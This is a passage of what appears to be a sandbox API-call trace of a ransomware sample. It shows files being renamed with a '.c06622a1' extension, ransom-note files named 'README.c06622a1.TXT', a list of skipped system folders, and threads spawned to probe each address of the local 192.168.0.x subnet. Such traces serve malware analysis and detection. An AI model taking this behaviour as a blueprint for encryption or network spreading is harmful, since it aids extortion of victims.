lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pzskkb.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pzskkb.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0156.966] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.966] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55ba6e77 [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x631dbb26 [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x594af19a [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a236ac7 [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53f96837 [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x11572ca [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24371808 [0156.972] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f50db41 [0156.975] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x7c91a055 [0156.975] RtlComputeCrc32 (PartialCrc=0xa055, Buffer=0x4670094, Length=0x80) returned 0x3c63636f [0156.975] RtlComputeCrc32 (PartialCrc=0x636f, Buffer=0x4670094, Length=0x80) returned 0xc7fb8ca4 [0156.975] RtlComputeCrc32 (PartialCrc=0x8ca4, Buffer=0x4670094, Length=0x80) returned 0xc6f802f1 [0156.975] RtlComputeCrc32 (PartialCrc=0x2f1, Buffer=0x4670094, Length=0x80) returned 0xa1848427 [0156.975] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0156.975] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.975] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.975] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb92ec0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbb92ec0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbb92ec0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.975] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.975] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.975] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0156.976] _wcsicmp (_Str1="backup", _Str2="Videos") returned -20 [0156.976] wcslen (_String="backup") returned 0x6 [0156.976] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0156.977] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0156.977] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.977] FindClose (in: hFindFile=0x2db8700 | out: hFindFile=0x2db8700) returned 1 [0156.978] _wcsicmp (_Str1="backup", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0156.978] wcslen (_String="backup") returned 0x6 [0156.978] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4470048) returned 1 [0156.978] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4480050) returned 1 [0156.978] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0156.978] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0156.978] _wcsicmp (_Str1="$recycle.bin", _Str2="Default") returned -64 [0156.978] wcslen (_String="$recycle.bin") returned 0xc [0156.978] _wcsicmp (_Str1="config.msi", _Str2="Default") returned -1 [0156.978] wcslen (_String="config.msi") returned 0xa [0156.978] _wcsicmp (_Str1="$windows.~bt", _Str2="Default") returned -64 [0156.978] wcslen (_String="$windows.~bt") returned 0xc [0156.978] _wcsicmp (_Str1="$windows.~ws", _Str2="Default") returned -64 [0156.978] wcslen (_String="$windows.~ws") returned 0xc [0156.978] _wcsicmp (_Str1="windows", _Str2="Default") returned 19 [0156.978] wcslen (_String="windows") returned 0x7 [0156.978] _wcsicmp (_Str1="appdata", _Str2="Default") returned -3 [0156.978] wcslen (_String="appdata") returned 0x7 [0156.978] _wcsicmp (_Str1="application data", _Str2="Default") returned -3 [0156.979] wcslen (_String="application data") returned 0x10 [0156.979] _wcsicmp (_Str1="boot", _Str2="Default") returned -2 [0156.979] wcslen (_String="boot") returned 0x4 [0156.979] _wcsicmp (_Str1="google", _Str2="Default") returned 3 [0156.979] wcslen (_String="google") returned 0x6 [0156.979] _wcsicmp (_Str1="mozilla", _Str2="Default") returned 9 [0156.979] wcslen (_String="mozilla") returned 0x7 [0156.979] _wcsicmp (_Str1="program files", _Str2="Default") returned 12 [0156.979] wcslen (_String="program files") returned 0xd [0156.979] _wcsicmp (_Str1="program files (x86)", _Str2="Default") returned 12 [0156.979] wcslen (_String="program files (x86)") returned 0x13 [0156.979] _wcsicmp (_Str1="programdata", _Str2="Default") returned 12 [0156.979] wcslen (_String="programdata") returned 0xb [0156.979] _wcsicmp (_Str1="system volume information", _Str2="Default") returned 15 [0156.979] wcslen (_String="system volume information") returned 0x19 [0156.979] _wcsicmp (_Str1="tor browser", _Str2="Default") returned 16 [0156.979] wcslen (_String="tor browser") returned 0xb [0156.979] _wcsicmp (_Str1="windows.old", _Str2="Default") returned 19 [0156.979] wcslen (_String="windows.old") returned 0xb [0156.979] _wcsicmp (_Str1="intel", _Str2="Default") returned 5 [0156.979] wcslen (_String="intel") returned 0x5 [0156.979] _wcsicmp (_Str1="msocache", _Str2="Default") returned 9 [0156.979] wcslen (_String="msocache") returned 0x8 [0156.979] _wcsicmp (_Str1="perflogs", _Str2="Default") returned 12 [0156.979] wcslen (_String="perflogs") returned 0x8 [0156.979] _wcsicmp (_Str1="x64dbg", _Str2="Default") returned 20 [0156.979] wcslen (_String="x64dbg") returned 0x6 [0156.979] _wcsicmp (_Str1="public", _Str2="Default") returned 12 [0156.979] wcslen (_String="public") returned 0x6 [0156.979] _wcsicmp (_Str1="all users", _Str2="Default") returned -3 [0156.979] wcslen (_String="all users") returned 0x9 [0156.979] _wcsicmp (_Str1="default", _Str2="Default") returned 0 [0156.979] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0156.979] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.979] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0156.979] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0156.979] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0156.980] wcslen (_String="autorun.inf") returned 0xb [0156.980] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0156.980] wcslen (_String="boot.ini") returned 0x8 [0156.980] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0156.980] wcslen (_String="bootfont.bin") returned 0xc [0156.980] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0156.980] wcslen (_String="bootsect.bak") returned 0xc [0156.980] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0156.980] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0156.980] _wcsicmp (_Str1="$recycle.bin", _Str2="Public") returned -76 [0156.980] wcslen (_String="$recycle.bin") returned 0xc [0156.980] _wcsicmp (_Str1="config.msi", _Str2="Public") returned -13 [0156.980] wcslen (_String="config.msi") returned 0xa [0156.980] _wcsicmp (_Str1="$windows.~bt", _Str2="Public") returned -76 [0156.980] wcslen (_String="$windows.~bt") returned 0xc [0156.980] _wcsicmp (_Str1="$windows.~ws", _Str2="Public") returned -76 [0156.980] wcslen (_String="$windows.~ws") returned 0xc [0156.980] _wcsicmp (_Str1="windows", _Str2="Public") returned 7 [0156.980] wcslen (_String="windows") returned 0x7 [0156.980] _wcsicmp (_Str1="appdata", _Str2="Public") returned -15 [0156.980] wcslen (_String="appdata") returned 0x7 [0156.980] _wcsicmp (_Str1="application data", _Str2="Public") returned -15 [0156.980] wcslen (_String="application data") returned 0x10 [0156.980] _wcsicmp (_Str1="boot", _Str2="Public") returned -14 [0156.980] wcslen (_String="boot") returned 0x4 [0156.980] _wcsicmp (_Str1="google", _Str2="Public") returned -9 [0156.980] wcslen (_String="google") returned 0x6 [0156.980] _wcsicmp (_Str1="mozilla", _Str2="Public") returned -3 [0156.980] wcslen (_String="mozilla") returned 0x7 [0156.980] _wcsicmp (_Str1="program files", _Str2="Public") returned -3 [0156.980] wcslen (_String="program files") returned 0xd [0156.980] _wcsicmp (_Str1="program files (x86)", _Str2="Public") returned -3 [0156.980] wcslen (_String="program files (x86)") returned 0x13 [0156.980] _wcsicmp (_Str1="programdata", _Str2="Public") returned -3 [0156.980] wcslen (_String="programdata") returned 0xb [0156.980] _wcsicmp (_Str1="system volume information", _Str2="Public") returned 3 [0156.980] wcslen (_String="system volume information") returned 0x19 [0156.981] _wcsicmp (_Str1="tor browser", _Str2="Public") returned 4 [0156.981] wcslen (_String="tor browser") returned 0xb [0156.981] _wcsicmp (_Str1="windows.old", _Str2="Public") returned 7 [0156.981] wcslen (_String="windows.old") returned 0xb [0156.981] _wcsicmp (_Str1="intel", _Str2="Public") returned -7 [0156.981] wcslen (_String="intel") returned 0x5 [0156.981] _wcsicmp (_Str1="msocache", _Str2="Public") returned -3 [0156.981] wcslen (_String="msocache") returned 0x8 [0156.981] _wcsicmp (_Str1="perflogs", _Str2="Public") returned -16 [0156.981] wcslen (_String="perflogs") returned 0x8 [0156.981] _wcsicmp (_Str1="x64dbg", _Str2="Public") returned 8 [0156.981] wcslen (_String="x64dbg") returned 0x6 [0156.981] _wcsicmp (_Str1="public", _Str2="Public") returned 0 [0156.981] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd17a0380, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd17a0380, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd17a0380, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.981] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.981] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.981] FindClose (in: hFindFile=0x2db8640 | out: hFindFile=0x2db8640) returned 1 [0156.981] _wcsicmp (_Str1="backup", _Str2="Users") returned -19 [0156.981] wcslen (_String="backup") returned 0x6 [0156.981] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2df4d60) returned 1 [0157.086] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e04d68) returned 1 [0157.093] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0157.095] _wcsicmp (_Str1="$recycle.bin", _Str2="Windows") returned -83 [0157.096] wcslen (_String="$recycle.bin") returned 0xc [0157.096] _wcsicmp (_Str1="config.msi", _Str2="Windows") returned -20 [0157.098] wcslen (_String="config.msi") returned 0xa [0157.100] _wcsicmp (_Str1="$windows.~bt", _Str2="Windows") returned -83 [0157.100] wcslen (_String="$windows.~bt") returned 0xc [0157.101] _wcsicmp (_Str1="$windows.~ws", _Str2="Windows") returned -83 [0157.101] wcslen (_String="$windows.~ws") returned 0xc [0157.103] _wcsicmp (_Str1="windows", _Str2="Windows") returned 0 [0157.105] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.105] FindClose (in: hFindFile=0x4faec0 | out: hFindFile=0x4faec0) returned 1 [0157.106] _wcsicmp (_Str1="backup", _Str2="C:") returned -1 [0157.106] wcslen (_String="backup") returned 0x6 [0157.106] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2dc4d48) returned 1 [0157.106] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2dd4d50) returned 1 [0157.107] Sleep (dwMilliseconds=0x64) [0157.202] Sleep (dwMilliseconds=0x64) [0157.310] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0157.311] WaitForMultipleObjects (nCount=0x8, lpHandles=0xf51048*=0x5e8, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0157.317] CloseHandle (hObject=0x5e8) returned 1 [0157.317] CloseHandle (hObject=0x5e4) returned 1 [0157.317] CloseHandle (hObject=0x5f0) returned 1 [0157.317] CloseHandle (hObject=0x5ec) returned 1 [0157.317] CloseHandle (hObject=0x5f4) returned 1 [0157.317] CloseHandle (hObject=0x5f8) returned 1 [0157.317] CloseHandle (hObject=0x5fc) returned 1 [0157.317] CloseHandle (hObject=0x600) returned 1 [0157.317] CloseHandle (hObject=0x5dc) returned 1 [0157.317] CloseHandle (hObject=0x5e0) returned 1 [0157.317] GetTickCount () returned 0x115b57a [0157.317] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x3ff73c | out: lpWSAData=0x3ff73c) returned 0 [0157.317] GetAdaptersInfo (in: AdapterInfo=0x0, SizePointer=0x3ff714 | out: AdapterInfo=0x0, SizePointer=0x3ff714) returned 0x6f [0158.294] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x280) returned 0x4ec9c8 [0158.294] GetAdaptersInfo (in: AdapterInfo=0x4ec9c8, SizePointer=0x3ff714 | out: AdapterInfo=0x4ec9c8, SizePointer=0x3ff714) returned 0x0 [0158.298] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0158.298] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xa8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x600 [0158.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e0 [0158.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5fc [0158.301] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f8 [0158.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0158.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5ec [0158.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0158.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e4 [0158.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e8 [0158.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c [0158.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xa00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x61c [0158.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xb00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x640 [0158.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xc00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e0 [0158.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xd00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x65c [0158.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xe00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x644 [0158.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0xf00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x604 [0158.312] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x608 [0158.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x60c [0158.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x62c [0158.314] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0158.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x630 [0158.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x610 [0158.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x67c [0158.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x368 [0158.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x648 [0158.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x638 [0158.322] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x620 [0158.322] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x63c [0158.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x664 [0158.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x618 [0158.324] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x66c [0158.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x1f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0158.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x678 [0158.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0158.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6dc [0158.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 